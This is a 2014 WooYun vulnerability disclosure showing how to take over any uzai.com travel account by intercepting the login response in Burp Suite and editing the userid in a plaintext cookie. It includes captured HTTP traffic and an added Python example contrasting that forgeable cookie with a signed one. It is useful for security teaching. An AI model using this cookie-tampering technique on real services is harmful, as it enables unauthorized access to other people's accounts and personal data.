
Watch Me Log In to Any of Uzai Travel's 500,000+ User Accounts at Will

2014-07-15 03:20

A worked example of response spoofing:

Logging in to any of Uzai Travel's 500,000+ user accounts at will

First, some background: registering an account with a mobile number normally requires SMS verification of that number, but Uzai Travel skips this step. You can enter any mobile number and the registration succeeds with no verification at all (a design flaw).

So I simply registered this account (18688888888:wooyun).

[Image: q5.jpg]



Capturing and intercepting the traffic when submitting the login yields the following POST request:

POST /reguser HTTP/1.1
Host: u.uzai.com
Proxy-Connection: keep-alive
Content-Length: 132
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://u.uzai.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://u.uzai.com/reguser
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uzaiURLRefer=http%3A%2F%2Fwww.uzai.com%2F; uzaiNewURLRefer=http%3A%2F%2Fwww.uzai.com%2F; SERVERID=app32; uzwDangDiYou=1; history_cookie=76313_uh_%u3010%u516D%u6708%u3011%u97E9%u56FD%u9996%u5C14+%u6D4E%u5DDE%u6B22%u4E505%u65E5%u6E38%uFF08%u4E1C%u822A%uFF09_uh_3%u98DE%u4E0D%u8D70%u56DE%u5934%u8DEF%uFF0C%u97E9%u56FD%u7ECF%u5178%u666F%u70B9%uFF0C%u4E1C%u5927%u95E8+%u660E%u6D1E%u81EA%u7531%u8D2D%u5A31%u3002_uh_http://sh.uzai.com/tour-76313.html_uh_http://r.uzaicdn.com/pic/11043/m/w160/h120/t1_uh_3174_uh_2014/5/30 下午9:58:30; ASP.NET_SessionId=griefnhaholjs3qwi3zcuck3; __pztm_ref.4bd3852a51f48d59272566a168b43ea1=%5B1401459603689%2C%22http%3A%2F%2Fwww.uzai.com%2F%22%5D; __pztm_lp=null|http://www.uzai.com/; _ga=GA1.2.1414981402.1401458306; __pztm_cv=DGPCCBIC3GNG9EFG.1401458305956.1.1401461828933.1401458305956.1401458305956; __pztm_ses.4bd3852a51f48d59272566a168b43ea1=*; Hm_lvt_c6ca6ea4f6a82938e24232a7a3da3949=1401458306; Hm_lpvt_c6ca6ea4f6a82938e24232a7a3da3949=1401461829; Hm_lvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401458306; Hm_lpvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401461829

hidden_UpPageURL=http%3A%2F%2Fwww.uzai.com%2F&username=18688888888&password=wooyun&txtPassCode=&txtCardNum=&cooktime=1&keyUserCount=



Using Burp Suite's "Do intercept - Response to this request" feature:

[Image: q2.jpg]



Forward the current packet, and the following response comes back:

HTTP/1.1 302 Found
Cache-Control: public
Content-Type: text/html; charset=utf-8
Location: http://www.uzai.com/
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: user=userName=uzai503483&Email=&Mobile=18688888888&realname=&userid=503483&nickname=&headUrl=&islogin=1&userGrade=A; domain=uzai.com; expires=Fri, 06-Jun-2014 15:02:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 30 May 2014 15:02:48 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.uzai.com/">here</a>.</h2>
</body></html>



Change the userid in the Set-Cookie header and forward it, and you are instantly inside someone else's account. My own userid is 503483, so there are 500,000+ accounts..

Proof of vulnerability:

Entering the user with userid=1, username: uzaiadmin

[Image: qz.jpg]



[Image: q8.jpg]



This should be a test account; it also exposes all kinds of other sensitive information.

I tested several more accounts too. I won't list them one by one; this is just enough to prove the impact.

Remediation:

The developers will know.
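The report leaves the fix unstated. As an added illustration that is not part of the WooYun report and not uzai.com's code, the Python below shows the two sides of the problem: a server that trusts the userid field of a plaintext user cookie shaped like the Set-Cookie above accepts any edited value, whereas an HMAC-signed cookie (or, better still, an opaque server-side session id) rejects the same edit. The cookie value, the signing key and all function names are constructed for the example.

```python
"""Client-side identity cookies: the forgeable pattern beside a signed one.
Added example, not code from the report or from the site it describes."""
import hashlib
import hmac
from typing import Dict, Optional

# Constructed sample with the same field layout as the Set-Cookie in the report.
SAMPLE_COOKIE = (
    "userName=uzai503483&Email=&Mobile=18688888888&realname=&userid=503483"
    "&nickname=&headUrl=&islogin=1&userGrade=A"
)

# Assumption: a real deployment loads this from a secrets store, never from source.
SERVER_KEY = b"constructed-demo-key-not-for-production"


def parse_fields(value: str) -> Dict[str, str]:
    """Split the '&'-separated key=value payload into a dict (order preserved)."""
    fields: Dict[str, str] = {}
    for pair in value.split("&"):
        if "=" in pair:
            key, val = pair.split("=", 1)
            fields[key] = val
    return fields


def naive_current_user(cookie_value: str) -> Optional[int]:
    """Vulnerable pattern: the userid is read straight from the cookie.
    Nothing binds the value to the server, so any client can set it."""
    fields = parse_fields(cookie_value)
    if fields.get("islogin") != "1":
        return None
    return int(fields["userid"])


def sign_cookie(fields: Dict[str, str], key: bytes = SERVER_KEY) -> str:
    """Hardened pattern: append an HMAC-SHA256 over the payload.
    Only a holder of the server key can produce a valid tag."""
    payload = "&".join(f"{k}={v}" for k, v in sorted(fields.items()))
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def verify_cookie(cookie_value: str, key: bytes = SERVER_KEY) -> Optional[int]:
    """Return the userid only when the tag matches the payload; any edit fails."""
    payload, sep, tag = cookie_value.rpartition("|")
    if not sep:
        return None  # no tag at all: treat as unauthenticated
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    fields = parse_fields(payload)
    if fields.get("islogin") != "1":
        return None
    return int(fields["userid"])


def edit_userid(cookie_value: str, new_userid: int) -> str:
    """Rewrite the userid field as an intercepting proxy would; any trailing
    tag is left untouched so the effect on verification is visible."""
    payload, sep, tag = cookie_value.rpartition("|")
    if not sep:
        payload, tag = cookie_value, ""
    fields = parse_fields(payload)
    fields["userid"] = str(new_userid)
    return "&".join(f"{k}={v}" for k, v in fields.items()) + sep + tag


def demo() -> Dict[str, Optional[int]]:
    """Run both patterns against the original and an edited cookie."""
    signed = sign_cookie(parse_fields(SAMPLE_COOKIE))
    return {
        "plain_original": naive_current_user(SAMPLE_COOKIE),
        "plain_edited": naive_current_user(edit_userid(SAMPLE_COOKIE, 1)),
        "signed_original": verify_cookie(signed),
        "signed_edited": verify_cookie(edit_userid(signed, 1)),
    }


if __name__ == "__main__":
    for name, user in demo().items():
        print(f"{name}: {user}")
```

The signed variant stops the edit shown in the report, but it still ships the identity to the client; the stronger design is a random, opaque session id stored server side and looked up on every request, with the cookie marked HttpOnly and Secure and the user's profile fields never placed in the cookie at all.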


Source: www.wooyun.org/bugs/wooyun-2014-062931
